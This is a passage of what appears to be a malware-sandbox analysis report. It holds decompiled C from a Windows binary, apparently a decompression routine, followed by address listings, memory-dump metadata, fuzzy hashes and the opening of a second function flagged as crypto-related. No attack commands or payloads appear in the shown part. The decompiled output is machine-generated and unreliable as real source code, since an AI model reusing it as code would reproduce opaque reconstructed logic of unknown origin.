																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x20);
										_t414 = E01013952(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E0100A800(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E0100A800(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x18) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x10) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E0101815A(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x18);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x10) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x10) - _t632;
													if( *(_t658 + 0x10) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x18) = _t381;
														_t640 = _t381;
														do {
															L82:
															E0101F4B0(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x14));
														_t598 =  *(_t658 + 0x1c);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E0101815A(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x18);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E0100A800(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x10) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E01011BAD(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
						E01014BB3(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}

0x01015c77
0x01015c77
0x01015c77
0x01015c77
0x01015c77
0x01015c7a
0x01015c7a
0x01015c80
0x01015c8b
0x00000000
0x01015c8d
0x01015c8d
0x01015c8d
0x01015c93
0x01015c93
0x01015c9c
0x01015c9f
0x00000000
0x00000000
0x01015cae
0x01015cb5
0x01016260
0x01016262
0x01016267
0x0101626e
0x0101626e
0x01015cbb
0x01015cbb
0x01015cbc
0x01015cbf
0x01015cc6
0x00000000
0x00000000
0x01015ccc
0x01015cd4
0x01015cd5
0x01015cd6
0x01015cd7
0x01015cde
0x00000000
0x01015ce0
0x00000000
0x01015ce0
0x01015cde
0x01015ce5
0x01015ce7
0x01015cec
0x01015cee
0x00000000
0x01015cf4
0x01015cf4
0x01015cf4
0x01015cf7
0x01015cf7
0x01015d07
0x01015d0c
0x01015d4c
0x01015d4e
0x01015d55
0x01015d5b
0x01015d61
0x01015d68
0x01015d94
0x01015d96
0x01015d97
0x01015d98
0x01015d9a
0x01015db3
0x01015db6
0x01015dbd
0x01015dc0
0x01015dc3
0x01015dcf
0x01015ddb
0x01015ddd
0x01015de3
0x01015de5
0x01015de5
0x01015de7
0x00000000
0x01015d9c
0x01015d9f
0x01015da2
0x01015da2
0x01015da2
0x01015da4
0x01015db1
0x01015db1
0x01015db1
0x01015da6
0x01015da6
0x01015da7
0x01015daa
0x01015dad
0x00000000
0x01015daf
0x00000000
0x01015daf
0x01015dad
0x00000000
0x01015da2
0x01015d6a
0x01015d6c
0x01015d6f
0x01015d79
0x01015d81
0x01015d87
0x01015d8a
0x01015def
0x01015def
0x01015df5
0x01015e31
0x01015e31
0x01015e37
0x01016233
0x01016233
0x01016239
0x01016271
0x01016271
0x01016277
0x01016414
0x01016414
0x01016414
0x0101641d
0x01016420
0x01016422
0x01016426
0x01016435
0x01016437
0x0101643a
0x01016441
0x01016447
0x0101644d
0x01016454
0x01016480
0x01016482
0x01016483
0x01016484
0x01016486
0x010164a2
0x010164a5
0x010164ac
0x010164af
0x010164b2
0x010164be
0x010164ca
0x010164cc
0x010164d2
0x010164d4
0x010164d4
0x010164d6
0x010164de
0x010164de
0x010164e1
0x010164e4
0x010164f5
0x010164f8
0x010164f8
0x010164e6
0x010164e6
0x010164e6
0x010164fa
0x010164fd
0x010164ff
0x01016503
0x0101650a
0x01016512
0x01016514
0x0101651b
0x0101651e
0x0101651e
0x01016521
0x01016521
0x01016524
0x0101652b
0x0101652f
0x01016532
0x01016544
0x01016544
0x0101654f
0x01016551
0x01016556
0x01016558
0x010165fd
0x010165fd
0x010165ff
0x01015c77
0x01015c77
0x01015c77
0x01015c77
0x00000000
0x01015c77
0x01015c77
0x01016605
0x01016605
0x0101660b
0x0101660b
0x01016611
0x01016616
0x0101661a
0x0101661d
0x01016622
0x0101662b
0x0101662d
0x0101662d
0x0101662d
0x00000000
0x0101660b
0x0101655e
0x0101655e
0x01016560
0x00000000
0x00000000
0x01016566
0x01016566
0x0101656c
0x0101656e
0x01016574
0x01016577
0x01016579
0x010165ca
0x010165ca
0x010165cd
0x00000000
0x00000000
0x010165d3
0x010165d5
0x010165d5
0x010165d8
0x010165dc
0x010165de
0x010165de
0x010165e2
0x010165e7
0x010165ea
0x010165ed
0x010165f0
0x010165f3
0x010165f3
0x010165f3
0x00000000
0x010165f8
0x0101657b
0x0101657d
0x0101657e
0x01016580
0x00000000
0x00000000
0x01016586
0x01016588
0x01016588
0x0101658b
0x0101658b
0x0101658d
0x0101658f
0x01016595
0x0101659b
0x010165a1
0x010165a7
0x010165ad
0x010165b3
0x010165b6
0x010165b9
0x010165bb
0x010165be
0x010165c0
0x010165c0
0x010165c0
0x00000000
0x01016534
0x01016534
0x01016534
0x0101653d
0x0101653e
0x01016092
0x01016092
0x01016099
0x0101609e
0x01015c77
0x01015c77
0x01015c77
0x01015c77
0x01015c77
0x01015c7a
0x01015c7a
0x01015c7a
0x01015c80
0x01015c8b
0x00000000
0x01015c8d
0x01015c8d
0x01015c8d
0x00000000
0x01015c8b
0x00000000
0x01015c7a
0x0101628b
0x01016292
0x010162a6
0x010162a6
0x010162b1
0x010162b4
0x010162b9
0x010162bb
0x010162bd
0x010163da
0x010163da
0x010163dc
0x01015c77
0x01015c77
0x01015c77
0x01015c77
0x01015c7a
0x01015c80
0x01015c8b
0x00000000
0x01015c8d
0x01015c8d
0x01015c8d
0x01015c8b
0x01015c77
0x010163e2
0x010163e2
0x010163e8
0x010163e8
0x010163ee
0x010163f3
0x010163f7
0x010163fa
0x010163ff
0x01016408
0x0101640a
0x0101640a
0x0101640a
0x01016632
0x01016632
0x00000000
0x01016632
0x010162c3
0x010162c3
0x010162c5
0x00000000
0x00000000
0x010162cb
0x010162cb
0x010162d1
0x010162d3
0x010162d9
0x010162dc
0x010162de
0x01016328
0x01016328
0x0101632b
0x01016356
0x01016356
0x01016359
0x0101635b
0x00000000
0x00000000
0x01016361
0x01016363
0x01016366
0x01016369
0x0101636c
0x00000000
0x00000000
0x01016372
0x01016375
0x01016378
0x0101637b
0x0101637e
0x00000000
0x00000000
0x01016384
0x01016387
0x0101638a
0x0101638d
0x01016390
0x00000000
0x00000000
0x01016396
0x01016399
0x0101639c
0x0101639f
0x010163a2
0x00000000
0x00000000
0x010163a8
0x010163ab
0x010163ae
0x010163b1
0x010163b4
0x00000000
0x00000000
0x010163ba
0x010163bd
0x010163c0
0x010163c3
0x010163c6
0x00000000
0x00000000
0x010163cc
0x010163cf
0x01015c77
0x01015c77
0x01015c77
0x01015c77
0x00000000
0x01015c77
0x01015c77
0x0101632d
0x0101632f
0x0101632f
0x01016332
0x01016336
0x01016338
0x01016338
0x0101633c
0x01016341
0x01016344
0x01016347
0x0101634a
0x0101634d
0x0101634d
0x0101634d
0x01016352
0x01016352
0x00000000
0x01016352
0x010162e0
0x010162e2
0x010162e3
0x010162e5
0x00000000
0x00000000
0x010162e7
0x010162e9
0x010162e9
0x010162ec
0x010162ec
0x010162ee
0x010162f0
0x010162f6
0x010162fc
0x01016302
0x01016308
0x0101630e
0x01016314
0x01016317
0x0101631a
0x0101631c
0x0101631f
0x01016321
0x01016321
0x01016321
0x00000000
0x01016326
0x01016294
0x01016294
0x0101629d
0x0101629e
0x00000000
0x0101629e
0x0101624c
0x01016253
0x01016258
0x01016258
0x00000000
0x01015c77
0x01016532
0x01016488
0x0101648e
0x01016491
0x01016491
0x01016491
0x01016493
0x00000000
0x00000000
0x01016495
0x01016495
0x01016496
0x01016499
0x0101649c
0x00000000
0x00000000
0x0101649e
0x00000000
0x0101649e
0x010164a0
0x010164a0
0x00000000
0x010164a0
0x01016456
0x01016458
0x0101645b
0x01016465
0x0101646d
0x01016473
0x01016476
0x00000000
0x00000000
0x00000000
0x00000000
0x01016428
0x01016428
0x0101642b
0x0101642d
0x01016430
0x01016430
0x01016430
0x00000000
0x01016428
0x0101627d
0x0101627d
0x01016280
0x01016283
0x01016283
0x0101623b
0x01016241
0x01016243
0x01016248
0x0101624a
0x00000000
0x00000000
0x00000000
0x0101624a
0x01015e3d
0x01015e3d
0x01015e43
0x01015e46
0x01015e57
0x01015e5a
0x01015e5a
0x01015e48
0x01015e48
0x01015e48
0x01015e5c
0x01015e5f
0x01015e61
0x01015e65
0x01015e6c
0x01015e74
0x01015e76
0x01015e7d
0x01015e80
0x01015e80
0x01015e83
0x01015e83
0x01015e88
0x01015e8f
0x01015e95
0x01015e9b
0x01015ea2
0x01015ece
0x01015ed0
0x01015ed1
0x01015ed2
0x01015ed4
0x01015ef0
0x01015ef3
0x01015efa
0x01015efd
0x01015f00
0x01015f0c
0x01015f18
0x01015f1a
0x01015f20
0x01015f22
0x01015f22
0x01015f24
0x00000000
0x01015f24
0x01015ed6
0x01015edc
0x01015edf
0x01015edf
0x01015edf
0x01015ee1
0x00000000
0x00000000
0x01015ee3
0x01015ee3
0x01015ee4
0x01015ee7
0x01015eea
0x00000000
0x00000000
0x01015eec
0x00000000
0x01015eec
0x01015eee
0x01015eee
0x00000000
0x01015ea4
0x01015ea4
0x01015ea6
0x01015ea9
0x01015eb3
0x01015ebb
0x01015ec1
0x01015ec4
0x01015f2c
0x01015f2c
0x01015f2f
0x01015f32
0x01015f42
0x01015f45
0x01015f45
0x01015f34
0x01015f34
0x01015f34
0x01015f47
0x01015f48
0x01015f4c
0x01015f4e
0x01015f52
0x01015f54
0x01016048
0x01016048
0x00000000
0x01015f5a
0x01015f5a
0x01015f5a
0x01015f5d
0x010160a3
0x010160a6
0x010160af
0x010160b7
0x010160bb
0x010160bf
0x010160c6
0x010160c9
0x010160cf
0x0101604b
0x0101604b
0x01016051
0x01016053
0x01016054
0x0101605a
0x0101605c
0x0101605d
0x01016063
0x01016065
0x01016065
0x01016065
0x01016063
0x0101605a
0x01016069
0x0101606f
0x01016075
0x01016078
0x0101607b
0x01016082
0x01016085
0x010160d7
0x010160dd
0x010160e0
0x010160e2
0x010160e9
0x010160eb
0x010160ed
0x010161f9
0x010161f9
0x010161fb
0x00000000
0x00000000
0x01016201
0x01016201
0x01016207
0x01016207
0x0101620d
0x01016212
0x01016216
0x01016219
0x0101621e
0x01016227
0x01016229
0x01016229
0x01016229
0x00000000
0x0101622e
0x010160f3
0x010160f3
0x010160f5
0x00000000
0x00000000
0x010160fb
0x010160fb
0x01016101
0x01016104
0x0101610a
0x0101610c
0x01016110
0x0101615b
0x0101615b
0x0101615e
0x0101618d
0x0101618d
0x0101618f
0x01016197
0x0101619a
0x0101619d
0x010161a6
0x010161a9
0x010161ac
0x010161b5
0x010161b8
0x010161bb
0x010161c4
0x010161c7
0x010161ca
0x010161d3
0x010161d6
0x010161d9
0x010161e2
0x010161e5
0x010161e8
0x010161f1
0x010161f1
0x010161e8
0x010161d9
0x010161ca
0x010161bb
0x010161ac
0x0101619d
0x00000000
0x0101618f
0x01016160
0x01016162
0x01016162
0x01016165
0x01016169
0x0101616b
0x0101616b
0x0101616f
0x01016174
0x01016177
0x0101617a
0x0101617d
0x01016180
0x01016180
0x01016180
0x01016185
0x01016189
0x00000000
0x01016189
0x01016112
0x01016112
0x01016115
0x00000000
0x00000000
0x01016117
0x01016119
0x01016119
0x0101611c
0x0101611c
0x0101611e
0x01016121
0x01016127
0x0101612d
0x01016133
0x01016139
0x0101613f
0x01016145
0x01016148
0x0101614b
0x0101614e
0x01016151
0x01016154
0x01016154
0x01016154
0x00000000
0x01016087
0x01016087
0x01016087
0x01016090
0x01016091
0x00000000
0x01016091
0x01016085
0x01015f63
0x01015f63
0x01015f96
0x01015f65
0x01015f68
0x01015f71
0x01015f79
0x01015f7c
0x01015f84
0x01015f8b
0x01015f91
0x01015f91
0x01015f9b
0x01015fa2
0x01015fa8
0x01015fae
0x01015fb5
0x01015fe1
0x01015fe3
0x01015fe4
0x01015fe5
0x01015fe7
0x01016003
0x01016006
0x0101600d
0x01016010
0x01016013
0x0101601f
0x0101602b
0x0101602d
0x01016033
0x01016035
0x01016035
0x01016037
0x00000000
0x01016037
0x01015fe9
0x01015fef
0x01015ff2
0x01015ff2
0x01015ff2
0x01015ff4
0x00000000
0x00000000
0x01015ff6
0x01015ff6
0x01015ff7
0x01015ffa
0x01015ffd
0x00000000
0x00000000
0x01015fff
0x00000000
0x01015fff
0x01016001
0x01016001
0x00000000
0x01015fb7
0x01015fb7
0x01015fb9
0x01015fbc
0x01015fc6
0x01015fce
0x01015fd4
0x01015fd7
0x0101603f
0x01016042
0x01016042
0x01016044
0x00000000
0x01016044
0x01015fb5
0x01015f54
0x01015ea2
0x01015df7
0x01015df7
0x01015dfe
0x01015e1c
0x01015e22
0x01015e27
0x01015e2a
0x00000000
0x01015e2a
0x01015e00
0x01015e0d
0x01015e15
0x00000000
0x01015e15
0x01015d68
0x01015d0e
0x01015d0e
0x01015d10
0x00000000
0x00000000
0x01015d12
0x01015d14
0x01015d19
0x01015d1f
0x01015d25
0x00000000
0x00000000
0x01015d2b
0x01015d2b
0x01015d3f
0x01015d3f
0x01015d46
0x0101663a
0x0101663a
0x00000000
0x0101663a
0x00000000
0x01015d46
0x01015d2d
0x01015d2d
0x01015d33
0x01015d39
0x00000000
0x00000000
0x00000000
0x01015d39
0x01015c7a

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction ID: d11a53dd03ddf92e23cda3026eef2f0656bc61d017bee45345be5a69b4ffbca1
Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction Fuzzy Hash: 9F62F7716047898FCB2ACF28CC906F9BBE1BF95204F08C56DD9DA8F34AD679A545CB10

Uniqueness

Uniqueness Score: -1.00%

Function 010170BF, Relevance: .8, Instructions: 773
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E010170BF(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
